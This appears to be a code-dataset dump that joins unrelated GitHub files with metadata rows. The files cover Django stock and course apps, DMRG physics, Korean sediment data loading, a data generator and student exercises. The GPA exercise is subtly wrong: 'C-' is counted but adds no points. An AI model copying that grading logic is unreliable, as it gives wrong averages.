Unlike in Lesson 1, you can assume that days_to_cancel will contain only
integers (there are no students who have not canceled yet).
The arguments are NumPy arrays. time_spent contains the amount of time spent
in the classroom for each student, and days_to_cancel contains the number
of days until each student cancel. The data is given in the same order
in both arrays.
'''
is_continued = days_to_cancel >= 7
paid_time = time_spent[is_continued]
return paid_time.mean()
# Time spent in the classroom in the first week for 20 students
time_spent = np.array([
12.89697233, 0. , 64.55043217, 0. ,
24.2315615 , 39.991625 , 0. , 0. ,
147.20683783, 0. , 0. , 0. ,
45.18261617, 157.60454283, 133.2434615 , 52.85000767,
0. , 54.9204785 , 26.78142417, 0.
])
# Days to cancel for 20 students
days_to_cancel = np.array([
4, 5, 37, 3, 12, 4, 35, 38, 5, 37, 3, 3, 68,
38, 98, 2, 249, 2, 127, 35
])
| [
"vinaykrishna1989@gmail.com"
] | vinaykrishna1989@gmail.com |
242f3d45299992e3784fe4a39f470b8f1c206bfb | 089030e3de35797990f34f2416a6f48f32c032fe | /3 Repetition/exercise68.py | ee33ea0522664216de275687886e8d0d990c391f | [] | no_license | nmoore32/Python-Workbook | ea26be6ed870c5f9497906717f3eaab5cac67571 | d3ed2b7191a14c3ded975915e7f9f2f9fa9da894 | refs/heads/master | 2021-06-14T05:54:38.988388 | 2020-04-09T20:49:42 | 2020-04-09T20:49:42 | 254,475,357 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,192 | py | ##
# Computes GPA from a list of letter grades provided by user
#
A_PLUS = 4.0
A_MINUS = 3.7
B_PLUS = 3.3
B = 3.0
B_MINUS = 2.7
C_PLUS = 2.3
C = 2.0
C_MINUS = 1.7
D_PLUS = 1.3
D = 1.0
F = 0
# Track sum of grade points for letter grades entered and number of grades entered
sum = 0
count = 0
# Read the first letter grade from user
grade = input("Enter a letter grade (blank to quit): ")
# Read additional letter grades from user until they enter a blank line
while grade != "":
# Add the grade points for the letter grade to sum
if grade == "A+" or grade == "A":
sum += A_PLUS
elif grade == "A-":
sum += A_MINUS
elif grade == "B+":
sum += B_PLUS
elif grade == "B":
sum += B
elif grade == "B-":
sum += B_MINUS
elif grade == "C+":
sum += C_PLUS
elif grade == "C":
sum += C
elif grade == "D+":
sum += D_PLUS
elif grade == "D":
sum += D
# Increment the counter by one
count += 1
# Read the next letter grade
grade = input("Enter a letter grade (blank to quit): ")
# Calculate the average
gpa = sum / count
# Display the result
print(f"Your GPA is {gpa:.2f}.")
| [
"61410102+nmoore32@users.noreply.github.com"
] | 61410102+nmoore32@users.noreply.github.com |
1f4bd449aba35de17062609461614b820c3a18f9 | eddbf9518e7384f0e9a1d9e19cbe74855c3f24bd | /2017011066LiShaoFei/First.py | 7f3f5ef75bfa8561246cc72cba9cfb0ca45f5650 | [] | no_license | wanghan79/2019_Python | 9d2391d799efd9545b2afb3565bc5c6d542d1d86 | f856409af92af3990773966d937d58d9d1cade04 | refs/heads/master | 2020-05-05T12:54:30.921361 | 2019-07-20T09:50:03 | 2019-07-20T09:50:03 | 180,050,522 | 11 | 14 | null | 2019-07-15T15:00:03 | 2019-04-08T01:59:24 | Python | UTF-8 | Python | false | false | 1,119 | py | import numpy as np
import random
import string
def random_list( start, stop, length):
if length >= 0:
length = int(length)
start, stop = (int(start), int(stop)) if start <= stop else (int(stop), int(start))
random_list = []
for i in range(length):
random_list.append(random.randint(start, stop))
return random_list
class dataGenerate:
def dGen(self, size=100000):
for i in range(size):
keys = random_list(0, 100, 10)
values = random_list(0, 100, 10)
dictionary = dict(zip(keys, values))
numx = np.random.randint(0, 1000)
numy = np.random.randint(0, 1000)
salt = ''.join(random.sample(string.ascii_letters + string.digits, 8)) # Generate a random string
data = {'string': salt, 'intX': numx, 'intY': numy, 'float': np.random.uniform(0, 1000000), 'keys':keys, 'values':values}
yield data
if __name__ == '__main__':
f = open("output.txt", "w")
for i in dataGenerate().dGen():
s=str(i)
f.write(s+'\n')
f.close() | [
"noreply@github.com"
] | wanghan79.noreply@github.com |
bb645742770c7dbfb384b13d8c761bfa3995c6bf | 62671dc1036be231348f7e1c11d6873e0d5196cb | /env/bin/gunicorn_django | ef5b783723dffe83a8f3f7aced945ba28a5a109b | [] | no_license | BaranovAV/track.mail.ru-web1 | 4f877f901298942778e1bf34e94fc8018d2600aa | 12d6e31f6d2e06e5fa784dc15efe822f497790c4 | refs/heads/master | 2021-01-13T08:10:27.482908 | 2016-10-23T18:36:39 | 2016-10-23T18:36:39 | 71,719,222 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 251 | #!/home/andy/projects/projectDZ2/env/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from gunicorn.app.djangoapp import run
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(run())
| [
"baranovab.1992@gmail.com"
] | baranovab.1992@gmail.com | |
7d69b0a585408e145f7c50fc555cfe9dfb7cb57f | 35cb7a8a22fdd3932b63c89b17f587205bd00fec | /apps/excursao/migrations/0002_excursao_is_internacional.py | 3f9637243e6f3af5d03ec7553d613c3b439ba4a1 | [] | no_license | rcoutelo/viajecomdarcy-web | debc24ec44e733c12257f3e89f3424ab7b3ee1f4 | 2ab2db407523299a58423f058c1f74231b15d617 | refs/heads/master | 2021-03-27T14:41:34.303463 | 2017-06-19T15:14:54 | 2017-06-19T15:14:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 454 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.10 on 2017-05-19 19:33
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('excursao', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='excursao',
name='is_internacional',
field=models.BooleanField(default=False),
),
]
| [
"lfa.luisfelipe@gmail.com"
] | lfa.luisfelipe@gmail.com |
5dd3a0f3d2cdac072c394e17112b26004a06a66b | 29744a2707c0c4335f51ab4a764fb24dc3a1ab08 | /stockmgmgt/views.py | 10182b9860dbaa4d214a064e3505d113a543a791 | [] | no_license | cccivenv/src3 | 492e63131829602317ea067f094b45370eccb0c7 | 4678aa4959e2e7cf71cb3d64a7b237ca6739cbf7 | refs/heads/master | 2023-04-25T01:15:24.652299 | 2021-05-07T06:10:03 | 2021-05-07T06:10:03 | 365,546,869 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,314 | py | from django.shortcuts import render, redirect
from django.http import HttpResponse
import csv
from django.contrib import messages
#from .models import *
from .forms import *
#from .resources import StockResource
#from tablib import Dataset
# Create your views here.
def home(request):
title = 'Welcome: This is the Home Page'
form = "eveg"
context = {
"title": title,
"test": form,
}
return render(request, "home.html", context)
def list_items(request):
title = 'LIST OF ITEMS'
form = StockSearchForm(request.POST or None)
queryset = Stock.objects.all()
context = {
"title": title,
"queryset": queryset,
"form": form,
}
if request.method == 'POST':
queryset = Stock.objects.filter( # category__icontains=form['category'].value(),
item_name__icontains=form['item_name'].value()
)
if form['export_to_CSV'].value() == True:
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename="List of stock.csv"'
writer = csv.writer(response)
writer.writerow(['CATEGORY', 'ITEM NAME', 'QUANTITY'])
instance = queryset
for stock in instance:
writer.writerow([stock.category, stock.item_name, stock.quantity])
return response
context = {
"form": form,
"title": title,
"queryset": queryset,
}
return render(request, "list_items.html", context)
def add_items(request):
form = StockCreateForm(request.POST or None)
if form.is_valid():
form.save()
messages.success(request, 'Successfully Saved')
return redirect("/list_items")
context = {
"form": form,
"title": "Add Item",
}
return render(request, "add_items.html", context)
def update_items(request, pk):
queryset = Stock.objects.get(id=pk)
form = StockUpdateForm(instance=queryset)
if request.method == 'POST':
form = StockUpdateForm(request.POST, instance=queryset)
if form.is_valid():
form.save()
messages.success(request, 'Successfully Saved')
return redirect('/list_items')
context = {
'form': form
}
return render(request, 'add_items.html', context)
def delete_items(request, pk):
queryset = Stock.objects.get(id=pk)
if request.method == 'POST':
queryset.delete()
messages.success(request, '刪除成功')
return redirect('/list_items')
return render(request, 'delete_items.html')
def stock_detail(request, pk):
queryset = Stock.objects.get(id=pk)
context = {
"title": queryset.item_name,
"queryset": queryset,
}
return render(request, "stock_detail.html", context)
def issue_items(request, pk):
queryset = Stock.objects.get(id=pk)
form = IssueForm(request.POST or None, instance=queryset)
if form.is_valid():
instance = form.save(commit=False)
instance.quantity -= instance.issue_quantity
instance.issue_by = str(request.user)
messages.success(request, "Issued SUCCESSFULLY. " + str(instance.quantity) + " " + str(instance.item_name) + "s now left in Store")
instance.save()
return redirect('/stock_detail/'+str(instance.id))
# return HttpResponseRedirect(instance.get_absolute_url())
context = {
"title": 'Issue ' + str(queryset.item_name),
"queryset": queryset,
"form": form,
"username": 'Issue By: ' + str(request.user),
}
return render(request, "add_items.html", context)
def receive_items(request, pk):
queryset = Stock.objects.get(id=pk)
form = ReceiveForm(request.POST or None, instance=queryset)
if form.is_valid():
instance = form.save(commit=False)
instance.quantity += instance.receive_quantity
instance.save()
messages.success(request, "Received SUCCESSFULLY. " + str(instance.quantity) + " " + str(instance.item_name)+"s now in Store")
return redirect('/stock_detail/'+str(instance.id))
# return HttpResponseRedirect(instance.get_absolute_url())
context = {
"title": 'Reaceive ' + str(queryset.item_name),
"instance": queryset,
"form": form,
"username": 'Receive By: ' + str(request.user),
}
return render(request, "add_items.html", context)
| [
"easy_waiting@hotmail.com"
] | easy_waiting@hotmail.com |
be2a6f284ba58d4734600586f30031795fb41b11 | e880764d19503274f1ea9d7185ed62333349c5b4 | /Some_thesis_calcs/gapcalc.py | 917e9d60e9e8beb2133d8ec2feb4eabd16ca3c27 | [] | no_license | AlfreBar/ergo-thesis | 03f90fcfd09140853bdc6be92ac4064fc855fc53 | be3ccebce65b97ed017173cf5ce43edddb62dbca | refs/heads/master | 2023-02-24T07:47:11.490870 | 2021-01-29T20:20:56 | 2021-01-29T20:20:56 | 331,362,573 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,920 | py | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import numpy as np
from scipy.sparse import kron, identity
from scipy.sparse.linalg import eigsh # Lanczos routine from ARPACK
from matplotlib import pyplot as plt
# Definiamo degli oggetti BLOCK che hanno come attributi: lunghezza della catena di siti nel blocco, dimensione dello spazio di Hilbert del blocco, $H_B$ e $H_{BS}$
# In[2]:
from collections import namedtuple
Block = namedtuple("Block", ["length", "basis_size", "operator_dict"])
EnlargedBlock = namedtuple("EnlargedBlock", ["length", "basis_size", "operator_dict"])
# In[3]:
def is_valid_block(block):
for op in block.operator_dict.values():
if op.shape[0] != block.basis_size or op.shape[1] != block.basis_size:
return False
return True
is_valid_enlarged_block = is_valid_block
# In[4]:
model_d = 2 # single-site basis size
# In[6]:
def enlarge_block(block,site,H2):
dblock = block.basis_size
b = block.operator_dict
dsite = site.basis_size
s=site.operator_dict
enlarged_operator_dict = {
"H": kron(b["H"], identity(dsite)) + kron(identity(dblock), s["H"]) + H2(b["conn_Sx"], s["conn_Sx"]),
"conn_Sx": kron(identity(dblock), s["conn_Sx"])
}
return EnlargedBlock(length=(block.length + 1),
basis_size=(dblock * model_d),
operator_dict=enlarged_operator_dict)
# In[7]:
def rotate_and_truncate(operator, transformation_matrix):
"""Transforms the operator to the new (possibly truncated) basis given by
`transformation_matrix`.
"""
return transformation_matrix.conjugate().transpose().dot(operator.dot(transformation_matrix))
# Ora bisogna fare un DMRG step: Creare blocco allargato, connettere, superblocco, trovare lo stato di base e poi costruire matrice densità
# In[8]:
def get_superblock(sys_enl, env_enl, H2):
assert is_valid_enlarged_block(sys_enl)
assert is_valid_enlarged_block(env_enl)
# Construct the full superblock Hamiltonian.
m_sys_enl = sys_enl.basis_size
m_env_enl = env_enl.basis_size
sys_enl_op = sys_enl.operator_dict
env_enl_op = env_enl.operator_dict
superblock_hamiltonian= kron(sys_enl_op["H"], identity(m_env_enl)) + kron(identity(m_sys_enl), env_enl_op["H"]) + \
H2(sys_enl_op["conn_Sx"], env_enl_op["conn_Sx"])
return superblock_hamiltonian
# In[9]:
# Diagonalizziamo e otteniamo matrice densità
def get_reduced_density_matrix(enl,psi0):
# Construct the reduced density matrix of the system by tracing out the
# environment
# psi=psi_{ij}|i>|j>
# We want to make the (sys, env) indices correspond to (row, column) of a
# matrix, respectively. Since the environment (column) index updates most
# quickly in our Kronecker product structure, psi0 is thus row-major ("C style")
# esempio 3 siti
# 12345678-> 12 000 and 001
# 34 010 and 011
# 56 100 and 101
# 78 110 and 111
#-1 means to be inferred
psi0 = psi0.reshape([enl.basis_size, -1], order="C")
rho = np.dot(psi0, psi0.conjugate().transpose())
return rho
# In[14]:
def get_transformation_matrix(rho,m,enl):
# Diagonalize the reduced density matrix and sort the eigenvectors by
# eigenvalue.
evals, evecs = np.linalg.eigh(rho)
possible_eigenstates = []
for eval, evec in zip(evals, evecs.transpose()):
possible_eigenstates.append((eval, evec))
possible_eigenstates.sort(reverse=True, key=lambda x: x[0]) # largest eigenvalue first
# Build the transformation matrix from the `m` overall most significant
# eigenvectors.
my_m = min(len(possible_eigenstates), m)
transformation_matrix = np.zeros((enl.basis_size, my_m), dtype='d', order='F')
for i, (eval, evec) in enumerate(possible_eigenstates[:my_m]):
transformation_matrix[:, i] = evec
return transformation_matrix, my_m
# In[15]:
def DMRG_step(sys,site,env,m,H2):
sys_enl = enlarge_block(sys,site,H2)
env_enl = enlarge_block(env,site,H2)
superblock=get_superblock(sys_enl,env_enl,H2)
energies, psis = eigsh(superblock, k=2, which="SA")
energy=energies[0]
energy1=energies[1]
psi0=psis[:,0]
psi1=psis[:,1]
rho=get_reduced_density_matrix(sys_enl,psi0)
rho1=get_reduced_density_matrix(sys_enl,psi1)
transformation_matrix, my_m =get_transformation_matrix(rho,m,sys_enl)
#truncation_error = 1 - sum([x[0] for x in possible_eigenstates[:my_m]])
#print("truncation error:", truncation_error)
# Rotate and truncate each operator.
new_operator_dict = {}
for name, op in sys_enl.operator_dict.items():
new_operator_dict[name] = rotate_and_truncate(op, transformation_matrix)
new_env_operator_dict = {}
for name, op in env_enl.operator_dict.items():
new_env_operator_dict[name] = rotate_and_truncate(op, transformation_matrix)
newblock = Block(length=sys_enl.length,
basis_size=my_m,
operator_dict=new_operator_dict)
newenv = Block(length=env_enl.length,
basis_size=my_m,
operator_dict=new_env_operator_dict)
return newblock,energy,energy1
# In[16]:
def infinite_system_algorithm(block,site, L, m,H2):
# Repeatedly enlarge the system by performing a single DMRG step, using a
# reflection of the current block as the environment.
while 2 * block.length < L:
#print("L =", block.length * 2 + 2)
block, energy ,energy1 = DMRG_step(block, site ,block, m,H2)
#print("E/L =", energy / (block.length * 2))
return energy1-energy
#%%
#fblock,fenergy,frho=infinite_system_algorithm(site,site,100,20,H2) | [
"57600721+Aleph093@users.noreply.github.com"
] | 57600721+Aleph093@users.noreply.github.com |
feddb7fea48b3868a79ca54108ca2c680f061a2e | 5a97652f9a0a6b46bc1e50342e8d2652e224e0d6 | /apps/courses/models.py | ff6a5e42860d5cea76a7239d03a20c4baad5e3aa | [] | no_license | dacer250/LxOnline | 5d22ad56bd9c48e21664f095348bd246b60cd49b | e58ab7ec14c877e5c176894d49522e11cd3efc87 | refs/heads/master | 2021-06-13T01:31:13.883126 | 2017-03-03T12:45:26 | 2017-03-03T12:45:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,502 | py | # encoding:utf-8
from __future__ import unicode_literals
from __future__ import absolute_import
from django.db import models
from apps.organization.models import CourseOrg, Teacher
# Create your models here.
class Course(models.Model):
organization = models.ForeignKey(CourseOrg, verbose_name=u'所属机构')
teacher = models.ForeignKey(Teacher, null=True, blank=True, verbose_name=u'授课讲师')
name = models.CharField(max_length=50, verbose_name=u'课程名')
desc = models.CharField(max_length=300, verbose_name=u'描述')
detail = models.TextField(verbose_name=u'详情')
category = models.CharField(max_length=20, default=u'开发', verbose_name=u'种类')
tag = models.CharField(max_length=20, default='', verbose_name=u'标签')
degree = models.CharField(max_length=2, verbose_name=u'等级',
choices=(('cj', u'初级'), ('zj', u'中级'), ('gj', u'高级')))
image = models.ImageField(max_length=100, upload_to='course/image/%Y/%m', verbose_name=u'封面')
learn_time = models.IntegerField(default=0, verbose_name=u'学习时长(分钟)')
student_num = models.IntegerField(default=0, verbose_name=u'学习人数')
fav_num = models.IntegerField(default=0, verbose_name=u'收藏人数')
click_num = models.IntegerField(default=0, verbose_name=u'点击数')
need_kown = models.CharField(max_length=1000, default='', verbose_name=u'课程需知')
create_time = models.DateTimeField(auto_now_add=True, verbose_name=u'添加时间')
class Meta:
verbose_name = u'课程'
verbose_name_plural = verbose_name
def __unicode__(self):
return self.name
def get_chapte_num(self):
return self.chapter_set.all().count()
def get_chaptes(self):
return self.chapter_set.all()
def get_learn_users(self):
return self.usercourse_set.all()[:5]
class Chapter(models.Model):
course = models.ForeignKey(Course, verbose_name=u'课程')
name = models.CharField(max_length=50, verbose_name=u'章节名')
create_time = models.DateTimeField(auto_now_add=True, verbose_name=u'添加时间')
class Meta:
verbose_name = u'章节'
verbose_name_plural = verbose_name
def __unicode__(self):
return self.name
def get_vedios(self):
return self.video_set.all()
class Video(models.Model):
name = models.CharField(max_length=50, verbose_name=u'视频名')
url = models.CharField(max_length=100, default='', verbose_name=u'访问地址')
learn_time = models.IntegerField(default=0, verbose_name=u'学习时长(分钟)')
chapter = models.ForeignKey(Chapter, verbose_name=u'章节')
create_time = models.DateTimeField(auto_now_add=True, verbose_name=u'添加时间')
class Meta:
verbose_name = u'视频'
verbose_name_plural = verbose_name
def __unicode__(self):
return self.name
class CourseResource(models.Model):
course = models.ForeignKey(Course, verbose_name=u'课程')
name = models.CharField(max_length=50, verbose_name=u'资源名')
download_url = models.FileField(max_length=100, upload_to='course/resource/%Y/%m',
verbose_name=u'资源文件')
create_time = models.DateTimeField(auto_now_add=True, verbose_name=u'添加时间')
class Meta:
verbose_name = u'课程资源'
verbose_name_plural = verbose_name
def __unicode__(self):
return self.name
| [
"651069858@qq.com"
] | 651069858@qq.com |
71913bb773b5410e899a35199682df594f695585 | 0497a6960fc2dab8d9e32d0d22a07676be1601a2 | /Methods and Functions/returnEven.py | 822a5621bd84fc4a666a1eddba0b1d244d746032 | [] | no_license | SaashaJoshi/Python | 114ff90e620ab1b95246ed584657d65e2e32213d | ff1083459aa4307d4460446ab2305ffb6217db65 | refs/heads/master | 2021-06-03T02:27:18.248834 | 2020-08-19T17:10:06 | 2020-08-19T17:10:06 | 141,785,153 | 1 | 7 | null | 2018-10-31T15:46:55 | 2018-07-21T05:51:31 | Python | UTF-8 | Python | false | false | 202 | py | def rEven(*args): #function takes arbitrary number of arguments
list=[]
for item in args:
if item%2==0:
list.append(item) #append even items to the empty list
print(list)
| [
"noreply@github.com"
] | SaashaJoshi.noreply@github.com |
7098e59a33ee69db9bf67850ed6b164b8ca3a140 | 164a02b8376df3a7a0c5ef4db7966b41205313b9 | /NSAF/newNsaf.py | b7c56f862e3e0b939fb52ca5f8f7e6bc2753d61b | [
"MIT"
] | permissive | ezPsycho/NSAF.py | 6c83e87ac6f350749b4270d3304006d782721ee2 | afb9c38ebf2576c136ea0a01b293d722a4398b1e | refs/heads/master | 2020-04-15T01:22:36.596541 | 2019-01-09T13:08:51 | 2019-01-09T13:08:51 | 164,273,757 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 893 | py | import os
import struct
from . import DTYPE_FORMATS, DTYPE_MARKS
def newNsaf(x, path, dtype = 'uint16', offset = (0,0,0)):
assert dtype in DTYPE_MARKS, '`dtype` should be one of `uint16`, `uint32`, `float32`, `float64`.'
assert len(x.shape) == 3, '`x` must be a 3d array.'
assert os.access(os.path.dirname(path), os.W_OK), 'The path is not writable.'
dtype_mark = DTYPE_MARKS[dtype]
dtype_format = DTYPE_FORMATS[dtype]
with open(path, 'wb') as f:
f.write(struct.pack('>H', dtype_mark))
for _dim in x.shape:
f.write(struct.pack('>H', _dim))
for _dim in offset:
f.write(struct.pack('>H', _dim))
for _ in range(3):
f.write(struct.pack('>H', 0))
list(map(
lambda x: f.write(struct.pack(dtype_format, x)),
x.flatten()
))
| [
"losses.don@gmail.com"
] | losses.don@gmail.com |
eff50a322a4758966d3454ce3b8bb8562467e91e | 7a36834432332e4cbe528cb8607949c783a834c0 | /user/migrations/0007_remove_cart_quality.py | 9de5df1b5650930def57c8a0410dcb79eb3690e7 | [] | no_license | phamdat16041999/hai_phong | 6e52c04d4f0dc24300fc039c01c127c55a5b4904 | c6f21734111f558a37645112fd20eb380b075e7e | refs/heads/main | 2023-05-03T15:24:15.559540 | 2021-05-21T13:21:16 | 2021-05-21T13:21:16 | 346,765,273 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 318 | py | # Generated by Django 3.1.4 on 2021-03-17 03:28
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('user', '0006_cart_quality'),
]
operations = [
migrations.RemoveField(
model_name='cart',
name='Quality',
),
]
| [
"56620800+phamdat16041999@users.noreply.github.com"
] | 56620800+phamdat16041999@users.noreply.github.com |
bdc88b26d53866749059d77cebd4536b11044064 | 874b03a2f96bd6ebdfa21b61d6c4a703ea4d3032 | /read_korean_data.py | d8cf78e2989ce99640d8dfe8036ed815467aa578 | [] | no_license | chunyaoyang/dissertation | b026c53eee38ca4c071d454fdd279a4a9a8fdca7 | 21768336b6913629235a8cd0e40f1205b511509f | refs/heads/master | 2020-04-23T18:11:05.174417 | 2019-02-18T21:48:26 | 2019-02-18T21:48:26 | 171,357,326 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,566 | py | # -*- coding: utf-8 -*-
"""
Created on Fri Jan 18 14:44:33 2019
@author: cyyang
"""
import os
import pandas as pd
import numpy as np
def findExcelFiles():
"""Load all excel files in folders"""
pathes = []
for root, dirs, files in os.walk("."):
for file in files:
if file.endswith(".xlsx"):
if file.startswith("Sediment"):
pathes.append(root + "/" + file)
return pathes
def read_sediment_measurement(f_path):
raw_df = pd.read_excel(f_path,sheet_name='sediment measurement',skiprows=4,usecols=[5,11,20,21,23,26])
raw_df.columns = ['Date', 'Q', 'C', 'Qs', 'Qt', 'ds']
raw_df.Date = raw_df.Date.astype(str)
raw_df.Date = pd.to_datetime(raw_df.Date.str[:10])
return raw_df
def read_dischargeTimeSeries(f_path):
df_raw = pd.read_excel(f_path, sheet_name='stage-discharge(daily)',skiprows=3,thousands=',')
df_raw = df_raw.drop(df_raw.columns[[0,2,5,8,11,14,17,20,23,26,29]], axis=1)
df = df_raw.apply(pd.to_numeric, errors='coerce')
df2 = df[df.columns[1]].append(df[df.columns[3]]).append(df[df.columns[5]]).append(df[df.columns[7]]).append(df[df.columns[9]]).append(df[df.columns[11]]).append(df[df.columns[13]]).append(df[df.columns[15]]).append(df[df.columns[17]]).append(df[df.columns[19]]).reset_index(drop=True)
Q = np.array(df2)
df1 = df_raw[df_raw.columns[0]].append(df_raw[df_raw.columns[2]]).append(df_raw[df_raw.columns[4]]).append(df_raw[df_raw.columns[6]]).append(df_raw[df_raw.columns[8]]).append(df_raw[df_raw.columns[10]]).append(df_raw[df_raw.columns[12]]).append(df_raw[df_raw.columns[14]]).append(df_raw[df_raw.columns[16]]).append(df_raw[df_raw.columns[18]]).reset_index(drop=True)
date = np.array(df1)
df = pd.DataFrame()
df['date'] = date
df['Q'] = Q
df = df.dropna(subset=['date'])
return df
def load_attribute():
elev = pd.read_csv('./data/elev.csv', header=0, usecols=[2,9,10,11], names=['Name', 'Elev',"MAX_Elev", 'Precip'])
df1 = pd.read_excel('./data/Sediment Yield Field Data set_1 (Han River Watershed)/Data_set-Han_18May2016.xlsx',
sheet_name='Han R.(H1~H4)',header=0,usecols=[3,4,5,6])
df2 = pd.read_excel('./data/Sediment Yield Field Data set_1 (Han River Watershed)/Data_set-Han_18May2016.xlsx',
sheet_name='Han R.(H5~H7)',header=0,usecols=[3,4,5])
df3 = pd.read_excel('./data/Sediment Yield Field Data set_2 (Nakdong River Watershed)/Data_set-Nakdong_18May2016.xlsx',
sheet_name='Nakdong R.(N1~N5)',header=0,usecols=[3,4,5,6,7])
df4 = pd.read_excel('./data/Sediment Yield Field Data set_2 (Nakdong River Watershed)/Data_set-Nakdong_18May2016.xlsx',
sheet_name='Nakdong R.(N6~N10)',header=0,usecols=[3,4,5,6,7])
df5 = pd.read_excel('./data/Sediment Yield Field Data set_2 (Nakdong River Watershed)/Data_set-Nakdong_18May2016.xlsx',
sheet_name='Nakdong R.(N11~N14)',header=0,usecols=[3,4,5,6])
df6 = pd.read_excel('./data/Sediment Yield Field Data set_5 (Seomjin River Watershed)/Data_set-Geum~Seomjin_18May2016.xlsx',
sheet_name='Geum R.(G1~G5)',header=0,usecols=[3,4,5,6,7])
df7 = pd.read_excel('./data/Sediment Yield Field Data set_5 (Seomjin River Watershed)/Data_set-Geum~Seomjin_18May2016.xlsx',
sheet_name='Yeongsan R.(Y1~Y5)',header=0,usecols=[3,4,5,6,7])
df8 = pd.read_excel('./data/Sediment Yield Field Data set_5 (Seomjin River Watershed)/Data_set-Geum~Seomjin_18May2016.xlsx',
sheet_name='Seomjin R.(S1~S4)',header=0,usecols=[3,4,5,6])
dataList = [df1,df2,df3,df4,df5,df6,df7,df8]
def removeEmpty(dataframe):
df = np.array(dataframe)[3:35]
df = np.delete(df, [2,24], axis=0)
return df
def bedsize(dataframe):
df = dataframe.apply(pd.to_numeric, errors='coerce')
df = np.array(df)[35:43]
dmin = np.nanmin(np.float64(df),axis=0)
dmax = np.nanmax(np.float64(df),axis=0)
dmean = np.nanmean(np.float64(df),axis=0)
return np.vstack((dmin,dmax,dmean))
id_list = []
for l in dataList:
for n in l.columns:
id_list.append(n)
processedDataList = []
for d in dataList:
att = removeEmpty(d)
bed = bedsize(d)
processed_d = np.concatenate((att,bed), axis=0)
processedDataList.append(processed_d)
attri_data = np.hstack((processedDataList[0],processedDataList[1],processedDataList[2],processedDataList[3],
processedDataList[4],processedDataList[5],processedDataList[6],processedDataList[7]))
attri_data = np.transpose(attri_data)
attribute = pd.concat([pd.DataFrame(id_list,columns=['Name']),pd.DataFrame(np.float64(attri_data))],axis=1)
attribute.rename(columns = {0:'Area'}, inplace = True)
attribute = pd.merge(attribute, elev, on='Name')
col_name = ['Name', 'lon', 'lat','Area', 'Avg_slope', 'Perimeter', 'Main_length',
'Tributary_length', 'Total_length', 'Density', 'Width',
'Slope_at_station', 'clay0', 'silt0', 'sand0', 'clay10',
'silt10','sand10', 'clay30','silt30','sand30','clay50',
'silt50','sand50','Urban','Agriculture','Forest',
'Pasture','Wetland','Bare_land','Water','D_min', 'D_max', 'D_mean', 'Elev',"Max_Elev", 'Precip']
attribute.columns = col_name
attribute = attribute.set_index(["Name"])
return attribute
| [
"xboxodx@gmail.com"
] | xboxodx@gmail.com |
b283669dc8927ce0f581ce7103969b38c2b5fbd6 | 6dda5b0e31c931dd3737df11ea31ffd30d6c273c | /auto_dino.py | 2e2fd2e45aa8fb536586b0e282e242746763864f | [] | no_license | RisabhKedai/autodino | 5f4efb0a8fb74eb15ce869689254b94e51bf729d | 774f9713286608a10a2a221f71d1b308bfa29f7b | refs/heads/master | 2022-10-17T04:36:04.724670 | 2020-06-20T11:34:16 | 2020-06-20T11:34:16 | 273,695,249 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,449 | py | import webbrowser
import pyautogui
import time
import PIL
import sys
#pyautogui.FAILSAFE=False
x1=470.0
x2=520.0
y1,y2=310,330
def hit(key):
pyautogui.press(key)
def collision(tbd):
for i in range(int(x1),int(x2)):
for j in range(y2,y1,-1):
if tbd[i,j]<100:
return True
return False
def bcollision(tbd):
for i in range(int(x1),int(x2)):
for j in range(240,300):
if tbd[i,j]<100:
return True
return False
if __name__=='__main__':
st=time.time()
webbrowser.open_new('https://chromedino.com')
time.sleep(10)
hit('UP')
while True:
image = PIL.ImageGrab.grab().convert('L')
tbd=image.load()
# for i in range(430,470):
# for j in range(25 0,330):
# tbd[i,j]=0
if collision(tbd):
hit('UP')
if bcollision(tbd) and not collision(tbd):
hit('DOWN')
#x1+=0.05 if x1<=780 else 0
x2+=0.05 if x2<=600 else 0
#if time.time()-st>=360:
# break
| [
"noreply@github.com"
] | RisabhKedai.noreply@github.com |
8e3b793faea6b9e1401c3476914c297ccc4552e4 | d4471e4987b79fe1230b2abf8a9a2c8d90549e01 | /train_cityscapes.py | 5d956a7f5b8973c7db076b04e516cce5b52c662c | [
"MIT"
] | permissive | dontLoveBugs/deeplabv3plus_pytorch | fe840f974295fc257915701907fe2b94ebaf8c5e | e9449b69f4a290a080bc48dc54d0fec05196f881 | refs/heads/master | 2020-04-06T23:07:39.301456 | 2018-11-17T06:12:30 | 2018-11-17T06:12:30 | 157,858,894 | 8 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,794 | py | import socket
import timeit
from datetime import datetime
import os
import glob
from collections import OrderedDict
import numpy as np
# PyTorch includes
import torch
from torch.autograd import Variable
import torch.optim as optim
from torchvision import transforms
from torch.utils.data import DataLoader
from torchvision.utils import make_grid
# Tensorboard include
from tensorboardX import SummaryWriter
# Custom includes
from dataloaders import cityscapes
from dataloaders import utils
from networks import deeplab_xception, deeplab_resnet
from dataloaders import custom_transforms as tr
gpu_id = 0  # CUDA device index; set < 0 to run on CPU
print('Using GPU: {} '.format(gpu_id))

# ---- Hyper-parameters ----------------------------------------------------
nEpochs = 100  # Number of epochs for training
resume_epoch = 0  # Default is 0; set to a checkpoint epoch to resume

p = OrderedDict()  # Parameters to include in the run report
p['trainBatch'] = 4  # Training batch size
testBatch = 4  # Testing batch size
useTest = True  # Evaluate on the test split after training
nValInterval = 5  # Run validation every nValInterval epochs
snapshot = 10  # Store a model every `snapshot` epochs
